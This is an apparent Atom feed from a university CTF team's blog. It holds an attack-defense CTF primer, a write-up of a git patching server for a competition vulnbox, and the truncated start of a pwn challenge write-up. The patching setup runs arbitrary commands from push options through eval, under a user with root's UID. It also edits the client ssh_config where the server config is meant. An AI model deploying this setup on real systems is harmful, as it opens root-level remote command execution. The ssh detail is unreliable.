<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://maplebacon.org/feed.xml" rel="self" type="application/atom+xml" /><link href="https://maplebacon.org/" rel="alternate" type="text/html" /><updated>2026-01-14T15:34:44+00:00</updated><id>https://maplebacon.org/feed.xml</id><title type="html">CTF @ UBC</title><subtitle>UBC&apos;s CTF team</subtitle><entry><title type="html">A primer on Attack Defense CTFs</title><link href="https://maplebacon.org/2025/09/maple-attack-defense-primer/" rel="alternate" type="text/html" title="A primer on Attack Defense CTFs" /><published>2025-09-23T00:00:00+00:00</published><updated>2025-09-23T00:00:00+00:00</updated><id>https://maplebacon.org/2025/09/maple-attack-defense-primer</id><content type="html" xml:base="https://maplebacon.org/2025/09/maple-attack-defense-primer/"><![CDATA[<h2 id="introduction-and-target-audience">Introduction and Target Audience</h2>

<p>Hi! If you’re reading this, it means you’re atleast a <em>little</em> curious about Attack/Defense CTFs.</p>

<p>This guide assumes that you are familiar with:</p>
<ul>
  <li>the concept of Capture The Flag competitions (atleast Jeopardy CTFs)</li>
  <li>what a flag looks like and how to find them.</li>
</ul>

<p>If you’re still here, strap in tight while we explore what the heck an Attack Defense CTF is.</p>

<h2 id="flavours-of-ctfs">Flavours of CTFs</h2>

<p>CTFs come in many flavors. The most common are Jeopardy, followed by Attack-Defense, and on rare occassions HackQuests (shout to hackceler8!). Each of these competition types require different skill sets revolving around cybersecurity.</p>

<ul>
  <li>
    <p><strong>Jeopardy</strong>: This is the most common type of CTF. Players solve from a list of challenges from different Categories (Web, Crypto, Pwn, Rev,misc). These challenges are hosted on a central server. Teams get points by attacking this challenge on the server and retrieving a flag. The competitions generally range from 24 to 48 hours and don’t require active involvement throughout the competition. Famouse Jeopardy CTFs include CSAW CTF, Plaid CTF, and Maple CTF :)</p>
  </li>
  <li>
    <p><strong>Attack-Defense</strong>: The original CTF type. Each Team is assigned a server in a shared network. Each server starts by hosting the same set of vulnerable services. Each round or tick (1-5 minutes long), Teams can gain points by attacking the services hosted on other teams’ servers to retrieve flags, and defending your services against attacks from other teams by patching out vulnerabilities <em>without</em> breaking its core functionality. The team with the highest points after X ticks win! These compeitions last around 6 - 10 hours and often require active player involvement. Popular A/D CTFs include DEF CON CTF, ENOWARS, and FAUST CTF.</p>
  </li>
  <li>
    <p><strong>HackQuests</strong>: This is just an example to demonstrate that CTFs don’t always fit in the above categories. A popular HackQuest is Hackceler8 (Google CTF Finals). In this competition, players are incentivized to find glitches in custom (retro) video games in order to achieve the fastest speedruns.</p>
  </li>
</ul>

<h2 id="attack-defense-ctfs">Attack-Defense CTFs</h2>

<p>This is a more in-depth section that covers the specific details about Attack Defense (A/D) CTFs.</p>

<h3 id="game-duration--ticks">Game Duration &amp; Ticks</h3>

<p>An attack defense CTF typically runs for about 8 hours. It is played in rounds of 1 to 5 minutes called a <strong>tick</strong>.</p>

<p>A game that starts at <code class="language-plaintext highlighter-rouge">14:00</code> with <code class="language-plaintext highlighter-rouge">5</code> minute ticks will look as follows</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+--------+----------------+
|  TICK  |     TIME       |
|--------+----------------|
|TICK 1  | 14:00 to 14:04 |
|--------+----------------|
|TICK 2  | 14:05 to 14:09 |
|--------+----------------|
|TICK 3  | 14:15 to 14:19 |
|--------+----------------|
|  ...   |      ...       |
+--------+----------------+

</code></pre></div></div>

<h3 id="the-game-network--your-vulnbox">The Game Network &amp; Your Vulnbox</h3>

<p>When you register for an Attack-Defense competition, each team is assigned a server. This server is referred to as a <strong>Vulnbox</strong>. This <a href="http://box.urbanup.com/151562">“box”</a>  hosts a set of vulnerable <em>services</em> that your team attempts to defend.</p>

<p>The core of an A/D CTF is the <strong>Game Network</strong>. It refers to the computer network that connects all the Team boxes to each other. That is, allow you to access the services on other teams’ boxes and allow other teams to access the services on your box. Aside from vulnboxes, it also hosts a central <em>gameserver</em>.</p>

<p>The method used to host services vary from CTF to CTF. It can range from using docker compose for each service to having a VM for each service.</p>

<p>(TODO: add photo of game network and examples of CTFs with docker compose)</p>

<h3 id="vpns-vulnbox-setup-and-whatnot">VPNs, vulnbox setup and whatnot</h3>

<p>To connect your vulnbox to the game network and also generally access game resources like the flag submitter or an internal scoreboard, competitions provide you a <strong>VPN configuration</strong>, maybe in the form of a <a href="https://www.wireguard.com/quickstart/">wireguard</a> configuration. Teams can use this VPN configuration to submit flags from their local machine or even attack other teams from their local machine to save compute resources on your vulnbox.</p>

<p>Vulnbox setups differs between competitions. Some competitions like ENOWARS has historically provided teams with a virtual machine as their vulnbox with minimal setup required, others like FAUST CTF expect you to provide your own machine to connect to the game network and need you to apply a VM image to set your vulnbox up.</p>

<h3 id="services">Services</h3>
<p>A <strong>service</strong> in an A/D CTF refers to a computer program/application that contain one or more vulnerabilities. A service can be considered as the A/D analogue for a challenge in Jeopardy CTF.</p>

<p>Similar to challenges in a Jeopardy CTF, services can fall into one or more categories such as Web, Crypto, Pwn, rev, etc. They can also provide you with the source code or only provide you with a binary executable for your team to reverse and exploit.</p>

<p>Here are a few examples of services:</p>
<ul>
  <li><a href="https://github.com/enowars/enowars8-service-piratesay">piratesay</a>: From ENOWARS 8, this service mimics a pirate-themed dark web forum where users can chat and brag about exploits. The service falls into the pwn category and only provides a binary executable.</li>
  <li><a href="https://github.com/Nautilus-Institute/finals-2025/tree/main/nautro">nautro</a>: From DEF CON 33 CTF , A Balatro-like resource management card game where players attempt to maximize their resources by playing cards. This service falls into the miscellaneous category, and only provides a binary executable.</li>
  <li><a href="https://github.com/fausecteam/faustctf-2024-quickr-maps/tree/master/checker">quickr-maps</a>: From FAUST CTF 2024, a location sharing application with an API. This falls into the Web category, and it contains the Go/Python source code.</li>
</ul>

<p>Note: The above services are of the Attack Defense Category of Services. Services can also use the “King of The Hill” format for scoring.</p>

<h3 id="king-of-the-hill-koth">King of The Hill (KotH)</h3>

<p>TODO at a later date.</p>

<p>No attack or defense involved. Services revolve around scoring the highest number of points among the other teams. It’s typically only seen in smaller A/D Competitions like DEF CON CTF (12 teams).</p>

<h3 id="scoring-points">Scoring Points</h3>

<p>There are 3 ways to score points in an A/D CTF. Each compeition places a different weightage on these components.</p>

<p>For each tick, you can win points from:</p>
<ul>
  <li><strong>Attack Points</strong>: Points you gain from exploiting another team’s service and submitting their flag. The more teams you exploit, the more points you gain.</li>
  <li><strong>Defense Points</strong>: Points you gain if no other team (fully) exploits your service. One service might have multiple flags.</li>
  <li><strong>SLA Points</strong>: Points you gain by having an active and reachable service which passes a set of tests from the gameserver.</li>
</ul>

<p>At any given tick, each of your services might be in the following states (varies between CTFs):</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">OK</code>: Everything working fine</li>
  <li><code class="language-plaintext highlighter-rouge">DOWN</code>: Service not running or another error in the network connection, e.g. a timeout or connection abort</li>
  <li><code class="language-plaintext highlighter-rouge">FAULTY</code>: Service is available, but not behaving as expected (fails SLA)</li>
  <li><code class="language-plaintext highlighter-rouge">FLAG_NOT_FOUND</code>: Service is behaving as expected, but a flag could not be retrieved</li>
  <li><code class="language-plaintext highlighter-rouge">RECOVERING</code>: Service is behaving as expected, at least one flag could be retrieved, but one or more from previous ticks could not.</li>
</ul>

<p>(adapted from https://ctf-gameserver.org/checkers/#check-results)</p>

<h3 id="the-gameserver">The Gameserver</h3>
<p>The <strong>gameserver</strong> is a machine/set of machines in the <em>game network</em> that plays a variety of roles.</p>

<p>It is responsible for:</p>
<ul>
  <li>Placing flags in your services every tick</li>
  <li>Running tests against each service every tick. (SLA)</li>
  <li>Flag submission</li>
  <li>Providing additional information about services if required.</li>
  <li>Anonymizing web traffic (sometimes)</li>
</ul>

<h3 id="attacking-services-attack-info-and-flag-stores">Attacking Services, Attack Info and Flag stores</h3>
<p>Attacking a service is similar to exploiting a challenge in a Jeopardy CTF. The general workflow is to find a vulnerability, exploit it to retrieve the flag.</p>

<p>Services typically can contain multiple flags, the location of each flag is often referred to as a <strong>flag store</strong>. An example of a flag store in <code class="language-plaintext highlighter-rouge">piratesay</code> from earlier would be the secrets file associated with each user account on the web forum. The same service also has another flag store in the from <code class="language-plaintext highlighter-rouge">.treasure</code> files which are password-protected.</p>

<p>Finding the flag stores can be unclear. However, examining the source code or reverse engineering the service is helpful. More on this in the later sections.</p>

<p><strong>Attack Info</strong> is a special and very important API endpoint on the gameserver that provides useful information about the flag stores for each Team’s service for the last few ticks. This can be in the form of user IDs, file paths, and more.</p>

<p><strong>Attack Info</strong> is typically presented as a large JSON with the following schema. (varies from CTF to CTF)</p>

<pre><code class="language-JSON">{
    "team1": {
        "tick n":
            {
                "flagstore 1": ["data"],
                "flagstore 2": ["more", "data"]
            }, 
        "tick n-1":
            {
                "flagstore 1": ["otherdata"],
                "flagstore 2": ["dead", "beef"]
            }, 
        "tick n-3":
            {
                "flagstore 1": ["data"],
                "flagstore 2": ["deadbeef", "face"]
            }, 
            
    },
    "team2":,
    "team3":,
    ...
}
</code></pre>

<p>Here is a real example of the attack info from [ENOWARS 9 - timetype] which displayed the Attack Info for the last 10 ticks.</p>
<pre><code class="language-JSON">{
...
 "10.1.26.1": {
        "205": {
          "1": [
            "hlU9y0DChKvoaWz"
          ],
          "2": [
            "PBPXITUPPU"
          ]
        },
        "206": {
          "1": [
            "4PZafbjfHLguKBX"
          ],
          "2": [
            "A460UZVSHR"
          ]
        },
        "207": {
          "1": [
            "VbaVyFL82Gi"
          ],
          "2": [
            "6KTHS66AUK"
          ]
        },
        "208": {
          "1": [
            "CsYkxqsbmu0"
          ],
          "2": [
            "PKFTDKIFPR"
          ]
        },
        "209": {
          "1": [
            "jOE2Vs2H"
          ],
          "2": [
            "59ZZEVTEK6"
          ]
        },
        "210": {
          "1": [
            "mPC5pP9JOEmb5W"
          ],
          "2": [
            "XUVI2O4HQO"
          ]
        },
        "211": {
          "1": [
            "umbqwFv4VkOw"
          ]
        },
        "212": {
          "1": [
            "6fHMlCfIbmZ1HG"
          ],
          "2": [
            "M9LGS3ZSEB"
          ]
        },
        "213": {
          "1": [
            "GBtSMPAv"
          ],
          "2": [
            "8U57UI01UA"
          ]
        },
        "214": {
          "1": [
            "H8Tu4MelKHHU9"
          ],
          "2": [
            "5JXUWCCXW7"
          ]
        }
      },
...
}

</code></pre>
<p><strong>Note:</strong> some A/D CTFs do not have Attack Info endpoints.</p>

<p>If a CTF <em>does</em> have this endpoint, it’s <strong>ALWAYS</strong> a good idea to check it for useful information that helps you understand and exploit a challenge.</p>

<p>Finally, it’s important to make sure that your exploits can run fast enough to retrieve the flag before it expires. Flags expire after X ticks. (X is set by the A/D CTF).</p>

<h3 id="defending-services-and-patching">Defending Services and Patching</h3>
<p>So, you found a vulnerability in your service. Now what? Well, you get to <strong>patch</strong> it.</p>

<p>Depending on the service and the game setup which varies from CTF to CTF, patching ranges from being a trivial task to annoyingly tedious.</p>

<p><strong>If patching source code:</strong> If your patch involves modifying the source code written in Python/Go/Java/etc, it’s a simply a matter of changing the code, recompiling the program if neccessary and restarting the service (via docker compose or VMs).</p>

<p><strong>If patching a binary (binpatching):</strong> If your patch needs to be applied on a binary executable, you would need to use a utility like <a href="https://docs.pwntools.com/en/stable/elf/elf.html">pwntools patching</a> or <a href="https://github.com/NixOS/patchelf">patchelf</a> to patch the bytes/assembly code.</p>

<p>Note that when you “push” your patch to your service, you might have to take it down for a tick losing out on sweet sweet SLA points. Even if your service “recovers”, you might end up failing the SLA.</p>

<h3 id="the-service-level-agreement-sla">the Service Level Agreement (SLA)</h3>

<p>At this point, you might wonder why you cannot patch your service by disabling access to all features. The issue is that you might fail the SLA.</p>

<p>As mentioned earlier, a <strong>Service Level Agreement (SLA)</strong> is set of tests that the gameserver runs against your services every tick. These tests are intended to ensure that your service still maintains its core features. A messaging app should be able to send/recieve messages, a game about cards should allow you to play the cards, and so on.</p>

<p>If your services pass these tests, your team recieves points for having a functional service.
If your services fail these tests, your team does not recieve SLA points or defense points.</p>

<h3 id="the-secret-other-thing-network-traffic-analysis">The Secret Other Thing: Network Traffic Analysis</h3>

<p>A team’s biggest asset for Attack/Defense CTFs is the network traffic it recieves from other teams.</p>

<p>Each tick, your team is able to capture the packets sent to it in the form of <strong><a href="https://en.wikipedia.org/wiki/Pcap">PCAPs</a></strong>.</p>

<p>Analyzing the payloads that other teams send to your service is extremely insightful. This data can help you find vulnerabilities in your services by showing you where to look in the service’s code. This information can also help you learn more about the service as well as help you write exploits to attack other teams. PCAPs can also be useful to identify how other teams might be stepping around your patches to services.</p>

<p>Traffic Analysis is an essential tool to succeed at Attack Defense CTFs. Teams often have extensive Infrastructure dedicating to capturing and analyzing packets.</p>

<h3 id="flag-submission">Flag submission</h3>

<p>Once you captured the flag (haha), you need to submit them to recieve points for the tick. It’s generally as simple as sending newline separated flags to a port at the submission URL.</p>

<p>More details can be found <a href="https://ctf-gameserver.org/submission/">here</a>. It does a much better job at explaining the internals of flag submitters if you’re interested.</p>

<h2 id="ad-infrastructure">AD Infrastructure</h2>

<p>To succeed in an Attack-Defense CTF, you must have infrastructure/tooling to automate/avoid repetitive tasks. The <strong>infrastructure</strong> can be as simple as a bash script that helps you submit flags to a bespoke application built from the ground up to efficiently analyze PCAPs.</p>

<p>Having access to tooling during the competition, enables your team to focus more of their precious resources on looking at services rather than remembering to run your exploit script every tick.</p>

<p>Infrastructure can define difference between winning and losing a game. Naturally, many teams are secretive about the tools/infrastructure that they use.</p>

<p>Let’s go through a few common tools many teams would use:</p>

<h3 id="throwers">Throwers</h3>
<p>A <strong>thrower</strong> is a tool that runs your exploit script against all the other boxes on the network and submits recieved flags for you. It’s a great abstraction that takes care of:</p>

<ul>
  <li>Running exploits each team</li>
  <li>Using the team-specifc and tick-specifc information about a service (attack info)</li>
  <li>Submitting flags</li>
</ul>

<p>A thrower might take the form of an <em>exploit template</em> that members can write and throw exploits with.</p>

<p>A popular “off-the-shelf” thrower is <a href="https://github.com/OpenAttackDefenseTools/ataka">ataka</a></p>

<h3 id="pcap-analyzers">PCAP Analyzers</h3>

<p>A <strong>PCAP Analyzer</strong> is an application that is used to tag, view, filter, and analyze Packet Capture data uploaded to it. These tools often have UIs where you are able to filter for and tag certain patterns in a packet such as <code class="language-plaintext highlighter-rouge">path_traversal</code> when you see a pattern of <code class="language-plaintext highlighter-rouge">../../../</code>.
By filtering through and monitoring data sent to services, you can gain a clearer understanding of how services work and how to approach exploiting/patching them.</p>

<p>There are plenty of popular “off-the-shelf” PCAP analyzers. The most commonly used tool is <a href="https://github.com/OpenAttackDefenseTools/tulip">Tulip</a>.</p>

<h3 id="patcher">Patcher</h3>
<p>A <strong>Patcher</strong> is a nice-to-have tool to reliably patch services in the competitions and avoiding the need to SSH into the vulnbox each time.</p>

<p>There are many solutions to patching. One such solution is to use git. You can read more about this in our previous writeup <a href="https://maplebacon.org/2024/09/faustctf-patcher/">Patching infrastructure for attack-defense CTFs</a>.</p>

<h3 id="anything-you-find-useful-d">Anything you find useful :D</h3>
<p>Yeah. What the title says. Tooling is an iterative process. As you compete in more CTFs, you find more use cases and functionalities in existing tools that are missing.</p>

<p>It’s a very exciting experience to build your own tooling from scratch that’s custom built for a CTF. Maybe you feel that you’re basically copy-pasting machine between your code editor and chatGPT, try to write a tool to automate triage with LLMs! There is an infinite potential for new tools you never knew you needed :D</p>

<h2 id="an-important-conclusion">An Important Conclusion</h2>

<p>Overwhelmed? It’s a lot of information to process in a single page. The best way to learn is to partcipate in competitions and learn as you go. The most exciting part is failing, iterating and improving for the years moving forward.</p>

<p>Each step towards improving your team’s processes, communication, and team allocation strategy to services, tooling is step for growth. Remember that the most important rule in CTFing is to have fun &lt;3</p>

<h2 id="resources">Resources</h2>
<ul>
  <li><a href="https://glitchrange.com/attack-defense">https://glitchrange.com/attack-defense</a>: A quick overview of A/D CTFs.</li>
  <li><a href="https://2025.faustctf.net/information/attackdefense-for-beginners/">https://2025.faustctf.net/information/attackdefense-for-beginners/</a>: Rules and the setup of a real Attack Defense CTF</li>
  <li><a href="https://ctf-gameserver.org/">https://ctf-gameserver.org/</a>: An excellent resource going over organizing Attack Defense CTFs</li>
  <li></li>
</ul>]]></content><author><name>hiswui</name></author><summary type="html"><![CDATA[Introduction and Target Audience]]></summary></entry><entry><title type="html">[FAUST 2024] Patching infrastructure for attack-defense CTFs</title><link href="https://maplebacon.org/2024/09/faustctf-patcher/" rel="alternate" type="text/html" title="[FAUST 2024] Patching infrastructure for attack-defense CTFs" /><published>2024-09-30T00:00:00+00:00</published><updated>2024-09-30T00:00:00+00:00</updated><id>https://maplebacon.org/2024/09/faustctf-patcher</id><content type="html" xml:base="https://maplebacon.org/2024/09/faustctf-patcher/"><![CDATA[<p>This is a writeup of the patching setup Maple Bacon used in FAUST 2024.</p>

<p>This last weekend, we played in <a href="https://2024.faustctf.net/">FAUST CTF 2024</a>. While we were limited on manpower &amp; had to scramble about with challenges, it was still quite a lot of fun.</p>

<p>FAUST provided eight challenges:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">floppcraft</code>: xxe + ssrf + fixed jwt signing</li>
  <li><code class="language-plaintext highlighter-rouge">quickr-maps</code>: url injection + ssrf, flags plotted as QR codes</li>
  <li><code class="language-plaintext highlighter-rouge">secretchannel</code>: bit flipping token id</li>
  <li><code class="language-plaintext highlighter-rouge">todo-list</code>: user id collision</li>
  <li><code class="language-plaintext highlighter-rouge">lvm</code>: type confusion pwn</li>
  <li><code class="language-plaintext highlighter-rouge">asm-chat</code>: insecure session handling</li>
  <li><code class="language-plaintext highlighter-rouge">missions</code>: cache shenanigans</li>
  <li><code class="language-plaintext highlighter-rouge">vault</code>: hardcoded rsa n</li>
</ul>

<p>Out of those, no one was able to exploit one (<code class="language-plaintext highlighter-rouge">lvm</code>), and only a handful of teams had an exploit for another (<code class="language-plaintext highlighter-rouge">missions</code>). We had working exploits for three: <code class="language-plaintext highlighter-rouge">floppcraft</code>, <code class="language-plaintext highlighter-rouge">todo-list</code>, and <code class="language-plaintext highlighter-rouge">asm_chat</code>, and had a nearly-working exploit for <code class="language-plaintext highlighter-rouge">quickr-maps</code>. We were able to patch <code class="language-plaintext highlighter-rouge">floppcraft</code> and <code class="language-plaintext highlighter-rouge">asm_chat</code> entirely, and partially patch <code class="language-plaintext highlighter-rouge">quickr-maps</code>, <code class="language-plaintext highlighter-rouge">todo-list-service</code>, and <code class="language-plaintext highlighter-rouge">vault</code>. We placed 27th, but peaked at 20th (when our exploits were all mostly working). Overall pretty alright! Not our best performance, but it was the first time we had played in an A/D CTF in a while.</p>

<p>I handled defense + patching + network analysis infrastructure. We used an entirely new system for patching that worked quite well (despite putting it together a week before the competition) - so I figured I’d write up a little something on it.</p>

<h2 id="design">Design</h2>

<p>In previous years, we’ve managed patching by SSHing into the box and manually editing the appropriate files + rebuilding. This sucks, for everyone involved - and if patches are more than a couple of lines long, it <em>really</em> sucks. We’ve used Git for ease of rollback / version history, but only to <em>track</em> services on the box itself. This got me thinking: could we just… set up a Git server on the box and push patches directly to it? We would need some way to treat a normal repo as an origin, though. And the Git server expects its origin repositories to be “bare”. So that wouldn’t work directly.</p>

<p>Or would it? As it turns out, the “bare” requirement is <a href="https://stackoverflow.com/a/28381311/11087133"><em>just a configuration option</em></a> and can be disabled. Treating an ordinary Git repository as an origin repo has several issues to watch out for, however: every file must be owned by the <code class="language-plaintext highlighter-rouge">git</code> user and you <em>cannot</em> have working/staged changes in the origin repository. But that’s it. Otherwise, it works fine. Ownership issues can be circumvented by treating the <code class="language-plaintext highlighter-rouge">git</code> user as <code class="language-plaintext highlighter-rouge">root</code>: not the best security practice, for sure, but fine for a team-internal server. This will let authorized users clone services with <code class="language-plaintext highlighter-rouge">git clone git@&lt;box-ip&gt;:/srv/&lt;service&gt;</code>, develop patches locally, and push their changes with <code class="language-plaintext highlighter-rouge">git push</code>.</p>

<p>Typically, services will need to be rebuilt for changes to be applied. While this is a nicer design for pushing <em>patches</em>, deploying those patches still means SSHing into the box, navigating to the challenge, and running <code class="language-plaintext highlighter-rouge">docker-compose up -d --build</code> or similar. Can this process be made any more streamlined?</p>

<p>As it turns out - Git supports has <a href="https://git-scm.com/docs/githooks">a rich <em>hooks</em> system</a> that we can adapt for our purposes. These hooks can run at arbitrary points in the Git workflow process - but the two we’re interested in are <code class="language-plaintext highlighter-rouge">pre-receive</code> and <code class="language-plaintext highlighter-rouge">post-receive</code>, as they are the only hooks that can take <em>user-specified parameters</em> (with the <code class="language-plaintext highlighter-rouge">--push-option</code> flag). The <code class="language-plaintext highlighter-rouge">pre-receive</code> hook runs immediately upon receiving a <code class="language-plaintext highlighter-rouge">git push</code>. The <code class="language-plaintext highlighter-rouge">post-receive</code> hook runs immediately after all new references are processed, and <em>only</em> if a reference was updated as a result. This isn’t perfect - it would be convenient if we could run the hook regardless of push success, so that in case a deploy fails at first we can run another commit - but it will suffice.</p>

<p>Creating a custom <code class="language-plaintext highlighter-rouge">post-receive</code> hook is straightforward. The Git documentation provides an example service, which we can modify to serve our purposes:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/sh</span>
<span class="c">#</span>
<span class="c"># A hook script to execute arbitrary code from push options.</span>
<span class="c"># This script will run when a new push is successful and the</span>
<span class="c"># --push-option flag has been used at least once.</span>
<span class="c"># It will execute the commands in the push-option in sequence.</span>

<span class="k">if </span><span class="nb">test</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$GIT_PUSH_OPTION_COUNT</span><span class="s2">"</span>
<span class="k">then
    </span><span class="nv">i</span><span class="o">=</span>0
    <span class="k">while </span><span class="nb">test</span> <span class="s2">"</span><span class="nv">$i</span><span class="s2">"</span> <span class="nt">-lt</span> <span class="s2">"</span><span class="nv">$GIT_PUSH_OPTION_COUNT</span><span class="s2">"</span>
    <span class="k">do</span> <span class="c"># this is exceptionally ugly but needed for indirect variables</span>
        <span class="nb">eval</span> <span class="s2">"action=</span><span class="se">\$</span><span class="s2">GIT_PUSH_OPTION_</span><span class="nv">$i</span><span class="s2">"</span>
        <span class="nb">echo</span> <span class="s2">"</span><span class="nv">$action</span><span class="s2">"</span>
        <span class="nb">eval</span> <span class="s2">"</span><span class="nv">$action</span><span class="s2">"</span>
        <span class="nv">i</span><span class="o">=</span><span class="k">$((</span>i <span class="o">+</span> <span class="m">1</span><span class="k">))</span>
    <span class="k">done
fi</span>
</code></pre></div></div>

<p>This hook must be placed in <code class="language-plaintext highlighter-rouge">.git/hooks/post-receive</code>, and be made executable. If desired, hooks can be installed <em>globally</em> by setting the global <code class="language-plaintext highlighter-rouge">core.hooksPath</code> configuration option. This is convenient for our purposes. Now, arbitrary build commands can be executed after a (successful) push with ex. <code class="language-plaintext highlighter-rouge">git push --push-option="docker-compose up -d --build"</code></p>

<h2 id="configuration">Configuration</h2>

<p>With fairly minimal configuration, we can get this all set up:</p>

<ol>
  <li>Create a new user <code class="language-plaintext highlighter-rouge">git</code> w/ the same UID/GID as <code class="language-plaintext highlighter-rouge">root</code> and w/ <code class="language-plaintext highlighter-rouge">git-shell</code> as their login shell:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>useradd <span class="nt">-ou</span> 0 <span class="nt">-g</span> 0 <span class="nt">--system</span> <span class="nt">--disabled-password</span> <span class="nt">--create-home</span> <span class="nt">--shell</span> /usr/bin/git-shell git
</code></pre></div>    </div>
  </li>
  <li>Generate SSH keys for the <code class="language-plaintext highlighter-rouge">git</code> user:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git ssh-keygen <span class="nt">-t</span> ed25519 <span class="nt">-N</span> <span class="s1">''</span> <span class="nt">-f</span> /home/git/.ssh/id_ed25519
</code></pre></div>    </div>
  </li>
  <li>Install <code class="language-plaintext highlighter-rouge">authorized_keys</code>, disable password authentication, install <code class="language-plaintext highlighter-rouge">post-receive</code> hooks, etc:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mv </span>authorized_keys /home/git/.ssh/authorized_keys <span class="o">&amp;&amp;</span> <span class="nb">chmod </span>640 /home/git/.ssh/authorized_keys
<span class="nb">echo</span> <span class="s2">"PasswordAuthentication no"</span> <span class="o">&gt;&gt;</span> /etc/ssh/ssh_config
<span class="nb">mv </span>post-receive /home/git/hooks/post-receive <span class="o">&amp;&amp;</span> <span class="nb">chmod </span>777 /home/git/hooks/post-receive
</code></pre></div>    </div>
  </li>
</ol>

<p>Be sure to run <code class="language-plaintext highlighter-rouge">systemctl restart sshd</code> after making these changes.</p>

<p>The following settings must be made for the <code class="language-plaintext highlighter-rouge">git</code> user:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git config <span class="nt">--global</span> receive.denyCurrentBranch updateInstead
git config <span class="nt">--global</span> receive.advertisePushOptions <span class="nb">true
</span>git config <span class="nt">--global</span> core.hooksPath /home/git/hooks/
</code></pre></div></div>

<p>These settings allow pushing to non-bare repos, allow the use of <code class="language-plaintext highlighter-rouge">--push-option</code>, and allow the installation of global commit hooks.
The following settings are also recommended:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git config <span class="nt">--global</span> user.name <span class="s2">"vulnbox"</span>
git config <span class="nt">--global</span> user.email <span class="s2">"vulnbox@example.com"</span>
git config <span class="nt">--global</span> init.defaultBranch main
</code></pre></div></div>

<p>Now, upon the release of services, check them into Git.
If there is any mutable data, remove it from Git tracking to avoid unstaged data issues.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git init <span class="o">&amp;&amp;</span> git stage <span class="nb">.</span> <span class="o">&amp;&amp;</span> git commit <span class="nt">-m</span> <span class="s2">"initial commit"</span>
git <span class="nb">rm</span> <span class="nt">-r</span> <span class="nt">--cached</span> data/ <span class="o">&amp;&amp;</span> git commit <span class="nt">-m</span> <span class="s2">"do not track mutable data"</span>
</code></pre></div></div>

<p>And that’s all you need. The SSH server will handle anyone connecting to the box via Git, and plumb them into <code class="language-plaintext highlighter-rouge">git-shell</code> so that cloning/pulling/pushing works.</p>

<p>If you encounter errors of the form <code class="language-plaintext highlighter-rouge">! [remote rejected]</code>, ensure that there are no uncommitted changes in any service. Be sure to remove mutable state from Git tracking to prevent this.</p>

<p>Hopefully this writeup is helpful to any teams new to the attack-defense format. If you find it useful, or have come up with any improvements that have worked for your team - let us know! We’re contactable over <a href="https://mastodon.social/@maplebaconctf">Mastodon</a>, <a href="https://twitter.com/maplebaconctf">Twitter</a>, and <a href="mailto:maple.bacon.ctf@gmail.com">email</a>.</p>]]></content><author><name>apropos</name></author><summary type="html"><![CDATA[This is a writeup of the patching setup Maple Bacon used in FAUST 2024.]]></summary></entry><entry><title type="html">[TFCCTF 2024] Santa’s Little Helper</title><link href="https://maplebacon.org/2024/08/tfcctf-santas-little-helper/" rel="alternate" type="text/html" title="[TFCCTF 2024] Santa’s Little Helper" /><published>2024-08-05T00:00:00+00:00</published><updated>2024-08-05T00:00:00+00:00</updated><id>https://maplebacon.org/2024/08/tfcctf-santas-little-helper</id><content type="html" xml:base="https://maplebacon.org/2024/08/tfcctf-santas-little-helper/"><![CDATA[<p>Ayyy misc pwn.</p>

<h3 id="challenge">Challenge</h3>

<blockquote>
  <p>Santa doesn’t have a lot of room left in his sleigh. Help him fit one more item</p>
</blockquote>

<p>The binary source file is provided, decompiling with Ghidra:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">undefined8</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>

<span class="p">{</span>
    <span class="kt">int</span> <span class="n">iVar1</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">in_FS_OFFSET</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">local_ac</span><span class="p">;</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">local_a0</span><span class="p">;</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">local_98</span><span class="p">;</span>
    <span class="n">undefined8</span> <span class="n">local_90</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">local_88</span> <span class="p">[</span><span class="mi">120</span><span class="p">];</span>
    <span class="kt">long</span> <span class="n">local_10</span><span class="p">;</span>
    
    <span class="n">local_10</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">long</span> <span class="o">*</span><span class="p">)(</span><span class="n">in_FS_OFFSET</span> <span class="o">+</span> <span class="mh">0x28</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="n">local_88</span><span class="p">,</span><span class="mh">0x78</span><span class="p">);</span>
    <span class="n">local_90</span> <span class="o">=</span> <span class="mh">0x10102464c457f</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">local_ac</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">local_ac</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">local_ac</span> <span class="o">=</span> <span class="n">local_ac</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">local_88</span><span class="p">[(</span><span class="kt">long</span><span class="p">)</span><span class="n">local_ac</span> <span class="o">+</span> <span class="o">-</span><span class="mi">8</span><span class="p">]</span> <span class="o">!=</span> <span class="n">local_88</span><span class="p">[</span><span class="n">local_ac</span><span class="p">])</span> <span class="p">{</span>
